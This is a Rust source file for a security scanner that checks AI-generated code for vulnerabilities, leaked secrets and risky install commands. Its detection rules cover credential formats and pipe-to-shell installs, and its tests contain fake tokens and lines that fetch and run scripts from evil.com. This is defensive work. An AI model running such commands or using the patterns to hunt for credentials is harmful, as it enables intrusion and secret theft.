Skip to main content

laminae_shadow/
analyzer.rs

1use std::borrow::Cow;
2use std::sync::LazyLock;
3
4use regex::Regex;
5use thiserror::Error;
6
7use crate::extractor::ExtractedBlock;
8use crate::report::{AnalysisSource, VulnCategory, VulnFinding, VulnSeverity};
9use crate::scanner;
10
11/// Internal error type for individual analyzer stages.
12#[derive(Error, Debug)]
13pub enum AnalyzerError {
14    #[error("Static analysis failed: {0}")]
15    Static(String),
16    #[error("LLM review failed: {0}")]
17    LlmReview(String),
18    #[error("Sandbox error: {0}")]
19    Sandbox(String),
20    #[error("Analyzer disabled or unavailable")]
21    Disabled,
22}
23
24/// Public error type for the Shadow crate's API surface.
25#[derive(Error, Debug)]
26pub enum ShadowError {
27    #[error("Static analysis failed: {0}")]
28    StaticAnalysis(String),
29    #[error("LLM review failed: {0}")]
30    LlmReview(String),
31    #[error("Sandbox execution failed: {0}")]
32    Sandbox(String),
33    #[error("Configuration error: {0}")]
34    Config(String),
35    #[error("Shadow engine is disabled")]
36    Disabled,
37    #[error("Internal error: {0}")]
38    Internal(String),
39}
40
41impl From<AnalyzerError> for ShadowError {
42    fn from(err: AnalyzerError) -> Self {
43        match err {
44            AnalyzerError::Static(msg) => ShadowError::StaticAnalysis(msg),
45            AnalyzerError::LlmReview(msg) => ShadowError::LlmReview(msg),
46            AnalyzerError::Sandbox(msg) => ShadowError::Sandbox(msg),
47            AnalyzerError::Disabled => ShadowError::Disabled,
48        }
49    }
50}
51
52/// Trait for composable analysis stages.
53/// Each implementation is independent, async, and fallible.
54///
55/// Implement this trait to add custom analysis stages to the Shadow pipeline.
56#[allow(async_fn_in_trait)]
57pub trait Analyzer: Send + Sync {
58    /// Human-readable name for logging.
59    fn name(&self) -> &'static str;
60
61    /// Check if this analyzer can run.
62    async fn is_available(&self) -> bool;
63
64    /// Analyze output and return findings.
65    async fn analyze(
66        &self,
67        ego_output: &str,
68        code_blocks: &[ExtractedBlock],
69    ) -> Result<Vec<VulnFinding>, AnalyzerError>;
70}
71
72/// Static pattern-based analyzer with vulnerability detection rules.
73pub struct StaticAnalyzer {
74    extra_rules: Vec<CompiledShadowRule>,
75}
76
77/// A user-defined vulnerability detection rule for the static analyzer.
78///
79/// All string fields accept both `&'static str` (for compile-time rules)
80/// and `String` (for rules loaded from config at runtime) via `Cow`.
81pub struct ShadowRule {
82    /// Unique identifier for the rule.
83    pub id: Cow<'static, str>,
84    /// Vulnerability category this rule detects.
85    pub category: VulnCategory,
86    /// Severity level of findings from this rule.
87    pub severity: VulnSeverity,
88    /// Regex pattern to match against code.
89    pub pattern: Cow<'static, str>,
90    /// Short title for findings.
91    pub title: Cow<'static, str>,
92    /// Detailed description of the vulnerability.
93    pub description: Cow<'static, str>,
94    /// CWE identifier, if applicable.
95    pub cwe: Option<u32>,
96    /// Suggested remediation.
97    pub remediation: Cow<'static, str>,
98}
99
100/// Pre-compiled version of ShadowRule, built once via LazyLock.
101struct CompiledShadowRule {
102    category: VulnCategory,
103    severity: VulnSeverity,
104    regex: Regex,
105    title: Cow<'static, str>,
106    description: Cow<'static, str>,
107    cwe: Option<u32>,
108    remediation: Cow<'static, str>,
109}
110
111/// Analyzer for dependency-related vulnerabilities in code output.
112///
113/// Detects known-vulnerable packages, typosquatting patterns, and
114/// dangerous install commands that an LLM might suggest.
115pub struct DependencyAnalyzer;
116
117impl DependencyAnalyzer {
118    pub fn new() -> Self {
119        Self
120    }
121}
122
123impl Default for DependencyAnalyzer {
124    fn default() -> Self {
125        Self::new()
126    }
127}
128
129struct DepRule {
130    pattern: &'static str,
131    title: &'static str,
132    description: &'static str,
133    severity: VulnSeverity,
134    category: VulnCategory,
135    cwe: Option<u32>,
136    remediation: &'static str,
137}
138
139/// Pre-compiled version of DepRule.
140struct CompiledDepRule {
141    regex: Regex,
142    title: &'static str,
143    description: &'static str,
144    severity: VulnSeverity,
145    category: VulnCategory,
146    cwe: Option<u32>,
147    remediation: &'static str,
148}
149
150const DEP_RULES: &[DepRule] = &[
151    DepRule {
152        pattern: r#"(pip|pip3)\s+install\s+--index-url\s+http://"#,
153        title: "Insecure package index (HTTP)",
154        description: "Installing packages from an unencrypted HTTP source enables MITM attacks.",
155        severity: VulnSeverity::High,
156        category: VulnCategory::DataExfiltration,
157        cwe: Some(829),
158        remediation: "Always use HTTPS for package indices.",
159    },
160    DepRule {
161        pattern: r#"npm\s+install\s+--ignore-scripts\s+false"#,
162        title: "NPM install with scripts enabled explicitly",
163        description:
164            "Enabling install scripts on untrusted packages risks arbitrary code execution.",
165        severity: VulnSeverity::Medium,
166        category: VulnCategory::CommandInjection,
167        cwe: Some(829),
168        remediation: "Audit packages before enabling install scripts.",
169    },
170    DepRule {
171        pattern: r#"(event-stream|ua-parser-js|coa|rc|colors)\b.*\d+\.\d+\.\d+"#,
172        title: "Previously compromised NPM package",
173        description:
174            "This package has a known supply chain attack history. Verify the version is safe.",
175        severity: VulnSeverity::High,
176        category: VulnCategory::AdversarialLogic,
177        cwe: Some(506),
178        remediation: "Pin to a verified safe version and audit the package.",
179    },
180    DepRule {
181        pattern: r#"(urllib3|requests|django|flask|lodash|express)\s*[<>=]+\s*[\d.]+.*\b(0\.\d|1\.[0-5]\.)"#,
182        title: "Potentially outdated dependency version",
183        description: "Very old versions of popular packages often contain known vulnerabilities.",
184        severity: VulnSeverity::Medium,
185        category: VulnCategory::LogicFlaw,
186        cwe: Some(1104),
187        remediation: "Update to the latest stable version.",
188    },
189    DepRule {
190        pattern: r#"curl\s+.*\|\s*(sh|bash|python|node)"#,
191        title: "Pipe-to-shell installation",
192        description: "Downloading and executing scripts in one step bypasses all verification.",
193        severity: VulnSeverity::Critical,
194        category: VulnCategory::CommandInjection,
195        cwe: Some(829),
196        remediation: "Download first, verify checksum/signature, then execute.",
197    },
198    DepRule {
199        pattern: r#"(git\+http://|git://)[^\s]+"#,
200        title: "Git dependency over unencrypted protocol",
201        description: "Git dependencies over HTTP or git:// are vulnerable to MITM.",
202        severity: VulnSeverity::Medium,
203        category: VulnCategory::DataExfiltration,
204        cwe: Some(319),
205        remediation: "Use HTTPS or SSH for git dependencies.",
206    },
207];
208
209impl Analyzer for DependencyAnalyzer {
210    fn name(&self) -> &'static str {
211        "dependency"
212    }
213    async fn is_available(&self) -> bool {
214        true
215    }
216
217    async fn analyze(
218        &self,
219        ego_output: &str,
220        code_blocks: &[ExtractedBlock],
221    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
222        let mut findings = Vec::new();
223        let compiled = &*COMPILED_DEP_RULES;
224
225        let targets: Vec<&str> = std::iter::once(ego_output)
226            .chain(code_blocks.iter().map(|b| b.content.as_str()))
227            .collect();
228
229        for text in &targets {
230            for rule in compiled {
231                for mat in rule.regex.find_iter(text) {
232                    let line_num = text[..mat.start()].matches('\n').count() + 1;
233                    findings.push(VulnFinding {
234                        id: generate_finding_id(),
235                        category: rule.category,
236                        severity: rule.severity,
237                        title: rule.title.to_string(),
238                        description: rule.description.to_string(),
239                        evidence: truncate_evidence(mat.as_str()),
240                        line: Some(line_num),
241                        cwe: rule.cwe,
242                        remediation: rule.remediation.to_string(),
243                        source: AnalysisSource::Static,
244                    });
245                }
246            }
247        }
248
249        Ok(findings)
250    }
251}
252
253/// Analyzer for secrets and credentials leaked in AI output.
254///
255/// Goes beyond simple password detection — catches API keys, tokens,
256/// connection strings, and cloud credentials with format-specific patterns.
257pub struct SecretsAnalyzer;
258
259impl SecretsAnalyzer {
260    pub fn new() -> Self {
261        Self
262    }
263}
264
265impl Default for SecretsAnalyzer {
266    fn default() -> Self {
267        Self::new()
268    }
269}
270
271struct SecretRule {
272    pattern: &'static str,
273    title: &'static str,
274    severity: VulnSeverity,
275    remediation: &'static str,
276}
277
278/// Pre-compiled version of SecretRule.
279struct CompiledSecretRule {
280    regex: Regex,
281    title: &'static str,
282    severity: VulnSeverity,
283    remediation: &'static str,
284}
285
286const SECRET_RULES: &[SecretRule] = &[
287    SecretRule {
288        pattern: r#"ghp_[0-9a-zA-Z]{36}"#,
289        title: "GitHub personal access token",
290        severity: VulnSeverity::Critical,
291        remediation:
292            "Revoke the token at github.com/settings/tokens and use environment variables.",
293    },
294    SecretRule {
295        pattern: r#"sk-[a-zA-Z0-9]{20}T3BlbkFJ[a-zA-Z0-9]{20}"#,
296        title: "OpenAI API key",
297        severity: VulnSeverity::Critical,
298        remediation: "Rotate the key at platform.openai.com/api-keys.",
299    },
300    SecretRule {
301        pattern: r#"sk-ant-api[a-zA-Z0-9_-]{80,}"#,
302        title: "Anthropic API key",
303        severity: VulnSeverity::Critical,
304        remediation: "Rotate the key at console.anthropic.com/settings/keys.",
305    },
306    SecretRule {
307        pattern: r#"xox[bpoas]-[0-9a-zA-Z-]{10,}"#,
308        title: "Slack token",
309        severity: VulnSeverity::Critical,
310        remediation: "Revoke and regenerate the token in your Slack app settings.",
311    },
312    SecretRule {
313        pattern: r#"(mongodb(\+srv)?://)[^\s"']+:[^\s"']+@"#,
314        title: "MongoDB connection string with credentials",
315        severity: VulnSeverity::Critical,
316        remediation: "Use environment variables for database connection strings.",
317    },
318    SecretRule {
319        pattern: r#"(postgres(ql)?|mysql|mssql)://[^\s"']+:[^\s"']+@"#,
320        title: "Database connection string with credentials",
321        severity: VulnSeverity::Critical,
322        remediation: "Use environment variables for database connection strings.",
323    },
324    SecretRule {
325        pattern: r#"(eyJ[a-zA-Z0-9_-]{20,}\.eyJ[a-zA-Z0-9_-]{20,}\.[a-zA-Z0-9_-]{20,})"#,
326        title: "JWT token in code",
327        severity: VulnSeverity::High,
328        remediation: "Never hardcode JWT tokens. Generate them at runtime.",
329    },
330    SecretRule {
331        pattern: r#"SG\.[a-zA-Z0-9_-]{22}\.[a-zA-Z0-9_-]{43}"#,
332        title: "SendGrid API key",
333        severity: VulnSeverity::Critical,
334        remediation: "Revoke and rotate the key in SendGrid dashboard.",
335    },
336    SecretRule {
337        pattern: r#"sk_live_[0-9a-zA-Z]{24,}"#,
338        title: "Stripe live secret key",
339        severity: VulnSeverity::Critical,
340        remediation: "Rotate immediately at dashboard.stripe.com/apikeys.",
341    },
342    SecretRule {
343        pattern: r#"AIza[0-9A-Za-z_-]{35}"#,
344        title: "Google API key",
345        severity: VulnSeverity::High,
346        remediation: "Restrict or rotate the key in Google Cloud Console.",
347    },
348];
349
350/// Pre-compiled regexes for DEP_RULES. Built once on first access.
351static COMPILED_DEP_RULES: LazyLock<Vec<CompiledDepRule>> = LazyLock::new(|| {
352    DEP_RULES
353        .iter()
354        .filter_map(|rule| {
355            Regex::new(rule.pattern).ok().map(|regex| CompiledDepRule {
356                regex,
357                title: rule.title,
358                description: rule.description,
359                severity: rule.severity,
360                category: rule.category,
361                cwe: rule.cwe,
362                remediation: rule.remediation,
363            })
364        })
365        .collect()
366});
367
368/// Pre-compiled regexes for SECRET_RULES. Built once on first access.
369static COMPILED_SECRET_RULES: LazyLock<Vec<CompiledSecretRule>> = LazyLock::new(|| {
370    SECRET_RULES
371        .iter()
372        .filter_map(|rule| {
373            Regex::new(rule.pattern)
374                .ok()
375                .map(|regex| CompiledSecretRule {
376                    regex,
377                    title: rule.title,
378                    severity: rule.severity,
379                    remediation: rule.remediation,
380                })
381        })
382        .collect()
383});
384
385impl Analyzer for SecretsAnalyzer {
386    fn name(&self) -> &'static str {
387        "secrets"
388    }
389    async fn is_available(&self) -> bool {
390        true
391    }
392
393    async fn analyze(
394        &self,
395        ego_output: &str,
396        code_blocks: &[ExtractedBlock],
397    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
398        let mut findings = Vec::new();
399        let compiled = &*COMPILED_SECRET_RULES;
400
401        let targets: Vec<&str> = std::iter::once(ego_output)
402            .chain(code_blocks.iter().map(|b| b.content.as_str()))
403            .collect();
404
405        for text in &targets {
406            for rule in compiled {
407                for mat in rule.regex.find_iter(text) {
408                    let line_num = text[..mat.start()].matches('\n').count() + 1;
409                    // Redact the actual secret in evidence
410                    let evidence = redact_secret(mat.as_str());
411                    findings.push(VulnFinding {
412                        id: generate_finding_id(),
413                        category: VulnCategory::HardcodedSecret,
414                        severity: rule.severity,
415                        title: rule.title.to_string(),
416                        description: "Credential or secret found in AI output.".to_string(),
417                        evidence,
418                        line: Some(line_num),
419                        cwe: Some(798),
420                        remediation: rule.remediation.to_string(),
421                        source: AnalysisSource::Static,
422                    });
423                }
424            }
425        }
426
427        Ok(findings)
428    }
429}
430
431/// Redact the middle of a secret, keeping only prefix for identification.
432fn redact_secret(s: &str) -> String {
433    if s.len() <= 10 {
434        return format!("{}***", &s[..s.len().min(4)]);
435    }
436    format!("{}***{}", &s[..8], &s[s.len() - 4..])
437}
438
439/// Internal rule definition using static strings (for hardcoded rules only).
440struct InternalRule {
441    _id: &'static str,
442    category: VulnCategory,
443    severity: VulnSeverity,
444    pattern: &'static str,
445    title: &'static str,
446    description: &'static str,
447    cwe: Option<u32>,
448    remediation: &'static str,
449}
450
451const SHADOW_RULES: &[InternalRule] = &[
452    InternalRule {
453        _id: "sqli-string-concat",
454        category: VulnCategory::SqlInjection,
455        severity: VulnSeverity::Critical,
456        pattern: r#"(SELECT|INSERT|UPDATE|DELETE|DROP)\s+.*\+\s*(user|input|param|req\.|request\.|args)"#,
457        title: "SQL injection via string concatenation",
458        description: "SQL query built by concatenating user-controlled input.",
459        cwe: Some(89),
460        remediation: "Use parameterized queries or an ORM.",
461    },
462    InternalRule {
463        _id: "sqli-format-string",
464        category: VulnCategory::SqlInjection,
465        severity: VulnSeverity::Critical,
466        pattern: r#"(f"|f'|format!\(|\.format\().*(?:SELECT|INSERT|UPDATE|DELETE|DROP)"#,
467        title: "SQL injection via format string",
468        description:
469            "SQL query constructed using format strings with potentially user-controlled values.",
470        cwe: Some(89),
471        remediation: "Use parameterized queries.",
472    },
473    InternalRule {
474        _id: "hardcoded-password",
475        category: VulnCategory::HardcodedSecret,
476        severity: VulnSeverity::High,
477        pattern: r#"(?i)(password|passwd|secret|api_key|apikey|token|auth)\s*=\s*["'][^"']{8,}["']"#,
478        title: "Hardcoded secret or credential",
479        description: "A credential appears to be hardcoded in the source.",
480        cwe: Some(798),
481        remediation: "Use environment variables or a secrets manager.",
482    },
483    InternalRule {
484        _id: "hardcoded-aws-key",
485        category: VulnCategory::HardcodedSecret,
486        severity: VulnSeverity::Critical,
487        pattern: r#"(?:AKIA|ASIA)[0-9A-Z]{16}"#,
488        title: "AWS access key ID detected",
489        description: "An AWS access key ID pattern was found in the code.",
490        cwe: Some(798),
491        remediation: "Remove the key, rotate it in AWS IAM, use IAM roles.",
492    },
493    InternalRule {
494        _id: "hardcoded-private-key",
495        category: VulnCategory::HardcodedSecret,
496        severity: VulnSeverity::Critical,
497        pattern: r#"-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----"#,
498        title: "Private key embedded in code",
499        description: "A private key header was found.",
500        cwe: Some(321),
501        remediation: "Remove the key, rotate it, store securely.",
502    },
503    InternalRule {
504        _id: "path-traversal-user-input",
505        category: VulnCategory::PathTraversal,
506        severity: VulnSeverity::High,
507        pattern: r#"(open|read|write|Path|PathBuf|fs\.|os\.path)\s*\(.*\.\.\/"#,
508        title: "Potential path traversal",
509        description: "File operation uses a path containing '../'.",
510        cwe: Some(22),
511        remediation: "Canonicalize paths and verify they remain within allowed directories.",
512    },
513    InternalRule {
514        _id: "xss-innerhtml",
515        category: VulnCategory::XssReflected,
516        severity: VulnSeverity::High,
517        pattern: r#"(innerHTML|outerHTML|document\.write|v-html|dangerouslySetInnerHTML)\s*="#,
518        title: "Potential XSS via unsafe HTML injection",
519        description: "Direct HTML injection that may include unsanitized user input.",
520        cwe: Some(79),
521        remediation: "Use textContent, sanitize HTML with DOMPurify.",
522    },
523    InternalRule {
524        _id: "unsafe-deserialize",
525        category: VulnCategory::InsecureDeserialization,
526        severity: VulnSeverity::High,
527        pattern: r#"(pickle\.loads?|yaml\.load\(|yaml\.unsafe_load|Marshal\.load|unserialize)\s*\("#,
528        title: "Insecure deserialization",
529        description: "Deserializing untrusted data can lead to RCE.",
530        cwe: Some(502),
531        remediation: "Use safe deserialization (yaml.safe_load, JSON).",
532    },
533    InternalRule {
534        _id: "weak-hash-md5",
535        category: VulnCategory::CryptoWeakness,
536        severity: VulnSeverity::Medium,
537        pattern: r#"(?i)(md5|sha1)\s*[.(]"#,
538        title: "Weak hash algorithm",
539        description: "MD5 and SHA-1 are cryptographically broken.",
540        cwe: Some(328),
541        remediation: "Use SHA-256 or better.",
542    },
543    InternalRule {
544        _id: "infinite-loop-risk",
545        category: VulnCategory::ResourceAbuse,
546        severity: VulnSeverity::Medium,
547        pattern: r#"while\s*\(\s*(true|1|True)\s*\)"#,
548        title: "Potential infinite loop",
549        description: "Unbounded loop that may consume CPU indefinitely.",
550        cwe: Some(835),
551        remediation: "Add a maximum iteration count or timeout.",
552    },
553];
554
555/// Pre-compiled regexes for SHADOW_RULES. Built once on first access.
556static COMPILED_SHADOW_RULES: LazyLock<Vec<CompiledShadowRule>> = LazyLock::new(|| {
557    SHADOW_RULES
558        .iter()
559        .filter_map(|rule| {
560            Regex::new(rule.pattern)
561                .ok()
562                .map(|regex| CompiledShadowRule {
563                    category: rule.category,
564                    severity: rule.severity,
565                    regex,
566                    title: Cow::Borrowed(rule.title),
567                    description: Cow::Borrowed(rule.description),
568                    cwe: rule.cwe,
569                    remediation: Cow::Borrowed(rule.remediation),
570                })
571        })
572        .collect()
573});
574
575impl StaticAnalyzer {
576    pub fn new() -> Self {
577        Self {
578            extra_rules: Vec::new(),
579        }
580    }
581
582    /// Create a static analyzer with additional custom rules.
583    ///
584    /// Returns an error if any rule's pattern is an invalid regex.
585    pub fn with_extra_rules(rules: Vec<ShadowRule>) -> Result<Self, regex::Error> {
586        let mut compiled = Vec::with_capacity(rules.len());
587        for rule in rules {
588            let regex = Regex::new(&rule.pattern)?;
589            compiled.push(CompiledShadowRule {
590                category: rule.category,
591                severity: rule.severity,
592                regex,
593                title: rule.title,
594                description: rule.description,
595                cwe: rule.cwe,
596                remediation: rule.remediation,
597            });
598        }
599        Ok(Self {
600            extra_rules: compiled,
601        })
602    }
603}
604
605impl Default for StaticAnalyzer {
606    fn default() -> Self {
607        Self::new()
608    }
609}
610
611impl Analyzer for StaticAnalyzer {
612    fn name(&self) -> &'static str {
613        "static"
614    }
615    async fn is_available(&self) -> bool {
616        true
617    }
618
619    async fn analyze(
620        &self,
621        ego_output: &str,
622        code_blocks: &[ExtractedBlock],
623    ) -> Result<Vec<VulnFinding>, AnalyzerError> {
624        let mut findings = Vec::new();
625
626        // Stage 1: Run embedded scanner on each code block
627        for block in code_blocks {
628            let filename = format!("output.{}", block.language.as_deref().unwrap_or("txt"));
629            let scan_findings = scanner::scan_content(&filename, &block.content);
630
631            for sf in scan_findings {
632                findings.push(VulnFinding {
633                    id: generate_finding_id(),
634                    category: map_scanner_category(&sf.rule_id),
635                    severity: map_scanner_severity(sf.severity),
636                    title: sf.message.clone(),
637                    description: sf.message,
638                    evidence: sf.evidence,
639                    line: Some(sf.line),
640                    cwe: None,
641                    remediation: "Review and fix the flagged pattern.".to_string(),
642                    source: AnalysisSource::Static,
643                });
644            }
645        }
646
647        // Stage 2: Shadow-specific rules on full output + code blocks
648        let compiled = &*COMPILED_SHADOW_RULES;
649        let targets: Vec<(&str, &str)> = std::iter::once(("output", ego_output))
650            .chain(code_blocks.iter().map(|b| {
651                let lang = b.language.as_deref().unwrap_or("code");
652                (lang, b.content.as_str())
653            }))
654            .collect();
655
656        let all_rules = compiled.iter().chain(self.extra_rules.iter());
657
658        for (source_name, text) in &targets {
659            for rule in all_rules.clone() {
660                for mat in rule.regex.find_iter(text) {
661                    let line_num = text[..mat.start()].matches('\n').count() + 1;
662                    let evidence = truncate_evidence(mat.as_str());
663
664                    findings.push(VulnFinding {
665                        id: generate_finding_id(),
666                        category: rule.category,
667                        severity: rule.severity,
668                        title: rule.title.to_string(),
669                        description: format!("[{}] {}", source_name, rule.description),
670                        evidence,
671                        line: Some(line_num),
672                        cwe: rule.cwe,
673                        remediation: rule.remediation.to_string(),
674                        source: AnalysisSource::Static,
675                    });
676                }
677            }
678        }
679
680        // Deduplicate (by category + title + evidence to avoid collapsing different rules)
681        findings.sort_by(|a, b| {
682            a.category
683                .to_string()
684                .cmp(&b.category.to_string())
685                .then(a.title.cmp(&b.title))
686                .then(a.evidence.cmp(&b.evidence))
687        });
688        findings.dedup_by(|a, b| {
689            a.category == b.category && a.title == b.title && a.evidence == b.evidence
690        });
691
692        Ok(findings)
693    }
694}
695
696fn map_scanner_severity(sev: scanner::Severity) -> VulnSeverity {
697    match sev {
698        scanner::Severity::Info => VulnSeverity::Low,
699        scanner::Severity::Warn => VulnSeverity::Medium,
700        scanner::Severity::Critical => VulnSeverity::High,
701    }
702}
703
704fn map_scanner_category(rule_id: &str) -> VulnCategory {
705    if rule_id.contains("eval") || rule_id.contains("exec") || rule_id.contains("spawn") {
706        VulnCategory::CommandInjection
707    } else if rule_id.contains("keychain")
708        || rule_id.contains("ssh")
709        || rule_id.contains("password")
710    {
711        VulnCategory::HardcodedSecret
712    } else if rule_id.contains("reverse-shell") || rule_id.contains("crypto-mining") {
713        VulnCategory::DataExfiltration
714    } else if rule_id.contains("sudo") || rule_id.contains("chmod") {
715        VulnCategory::PrivilegeEscalation
716    } else if rule_id.contains("curl") || rule_id.contains("webhook") || rule_id.contains("dns") {
717        VulnCategory::DataExfiltration
718    } else if rule_id.contains("base64") || rule_id.contains("hex") || rule_id.contains("char-code")
719    {
720        VulnCategory::CommandInjection
721    } else {
722        VulnCategory::Unknown
723    }
724}
725
726fn truncate_evidence(s: &str) -> String {
727    let trimmed = s.trim();
728    if trimmed.len() > 150 {
729        format!("{}...", &trimmed[..150])
730    } else {
731        trimmed.to_string()
732    }
733}
734
735/// Generate a unique finding ID using timestamp + atomic counter.
736fn generate_finding_id() -> String {
737    use std::sync::atomic::{AtomicU64, Ordering};
738    static COUNTER: AtomicU64 = AtomicU64::new(0);
739    let ts = std::time::SystemTime::now()
740        .duration_since(std::time::UNIX_EPOCH)
741        .unwrap_or_default()
742        .as_nanos();
743    let count = COUNTER.fetch_add(1, Ordering::Relaxed);
744    format!("shd-{:x}-{:04x}", ts, count)
745}
746
747#[cfg(test)]
748mod tests {
749    use super::*;
750
751    fn make_block(lang: &str, content: &str) -> ExtractedBlock {
752        ExtractedBlock {
753            language: Some(lang.to_string()),
754            content: content.to_string(),
755            char_offset: 0,
756        }
757    }
758
759    #[tokio::test]
760    async fn test_detects_sql_injection() {
761        let analyzer = StaticAnalyzer::new();
762        let blocks = vec![make_block(
763            "python",
764            r#"query = "SELECT * FROM users WHERE id = " + user_input"#,
765        )];
766        let findings = analyzer.analyze("", &blocks).await.unwrap();
767        assert!(findings
768            .iter()
769            .any(|f| f.category == VulnCategory::SqlInjection));
770    }
771
772    #[tokio::test]
773    async fn test_detects_hardcoded_password() {
774        let analyzer = StaticAnalyzer::new();
775        let blocks = vec![make_block(
776            "python",
777            r#"password = "supersecretpassword123""#,
778        )];
779        let findings = analyzer.analyze("", &blocks).await.unwrap();
780        assert!(findings
781            .iter()
782            .any(|f| f.category == VulnCategory::HardcodedSecret));
783    }
784
785    #[tokio::test]
786    async fn test_clean_code() {
787        let analyzer = StaticAnalyzer::new();
788        let blocks = vec![make_block(
789            "rust",
790            "fn greet() -> String { \"hello\".to_string() }",
791        )];
792        let findings = analyzer.analyze("", &blocks).await.unwrap();
793        assert!(findings.is_empty());
794    }
795
796    #[tokio::test]
797    async fn test_detects_xss() {
798        let analyzer = StaticAnalyzer::new();
799        let blocks = vec![make_block("js", "element.innerHTML = userInput;")];
800        let findings = analyzer.analyze("", &blocks).await.unwrap();
801        assert!(findings
802            .iter()
803            .any(|f| f.category == VulnCategory::XssReflected));
804    }
805
806    #[tokio::test]
807    async fn test_detects_eval_via_scanner() {
808        let analyzer = StaticAnalyzer::new();
809        let blocks = vec![make_block("js", "eval(userInput);")];
810        let findings = analyzer.analyze("", &blocks).await.unwrap();
811        assert!(!findings.is_empty());
812    }
813
814    // ── DependencyAnalyzer tests ──
815
816    #[tokio::test]
817    async fn test_dep_detects_pipe_to_shell() {
818        let analyzer = DependencyAnalyzer::new();
819        let blocks = vec![make_block("sh", "curl https://evil.com/setup.sh | bash")];
820        let findings = analyzer.analyze("", &blocks).await.unwrap();
821        assert!(findings.iter().any(|f| f.title.contains("Pipe-to-shell")));
822    }
823
824    #[tokio::test]
825    async fn test_dep_detects_insecure_index() {
826        let analyzer = DependencyAnalyzer::new();
827        let blocks = vec![make_block(
828            "sh",
829            "pip install --index-url http://evil.com/simple package",
830        )];
831        let findings = analyzer.analyze("", &blocks).await.unwrap();
832        assert!(findings
833            .iter()
834            .any(|f| f.title.contains("Insecure package index")));
835    }
836
837    #[tokio::test]
838    async fn test_dep_clean() {
839        let analyzer = DependencyAnalyzer::new();
840        let blocks = vec![make_block("sh", "pip install requests")];
841        let findings = analyzer.analyze("", &blocks).await.unwrap();
842        assert!(findings.is_empty());
843    }
844
845    // ── SecretsAnalyzer tests ──
846
847    #[tokio::test]
848    async fn test_secrets_detects_github_token() {
849        let analyzer = SecretsAnalyzer::new();
850        let blocks = vec![make_block(
851            "py",
852            "token = \"ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdef1234\"",
853        )];
854        let findings = analyzer.analyze("", &blocks).await.unwrap();
855        assert!(findings.iter().any(|f| f.title.contains("GitHub")));
856        // Verify the token is redacted in evidence
857        assert!(findings[0].evidence.contains("***"));
858    }
859
860    #[tokio::test]
861    async fn test_secrets_detects_stripe_key() {
862        let analyzer = SecretsAnalyzer::new();
863        // Build the test key dynamically to avoid triggering GitHub push protection
864        let key = format!("sk_live_{}", "5".repeat(24));
865        let code = format!("const key = \"{key}\"");
866        let blocks = vec![make_block("js", &code)];
867        let findings = analyzer.analyze("", &blocks).await.unwrap();
868        assert!(findings.iter().any(|f| f.title.contains("Stripe")));
869    }
870
871    #[tokio::test]
872    async fn test_secrets_detects_db_connection() {
873        let analyzer = SecretsAnalyzer::new();
874        let blocks = vec![make_block(
875            "py",
876            "db = \"postgresql://admin:password123@prod.db.com:5432/main\"",
877        )];
878        let findings = analyzer.analyze("", &blocks).await.unwrap();
879        assert!(findings
880            .iter()
881            .any(|f| f.title.contains("Database connection")));
882    }
883
884    #[tokio::test]
885    async fn test_secrets_clean() {
886        let analyzer = SecretsAnalyzer::new();
887        let blocks = vec![make_block("py", "x = os.environ['API_KEY']")];
888        let findings = analyzer.analyze("", &blocks).await.unwrap();
889        assert!(findings.is_empty());
890    }
891
892    #[test]
893    fn test_redact_secret() {
894        assert_eq!(
895            redact_secret("ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZab"),
896            "ghp_ABCD***YZab"
897        );
898        assert_eq!(redact_secret("short"), "shor***");
899    }
900}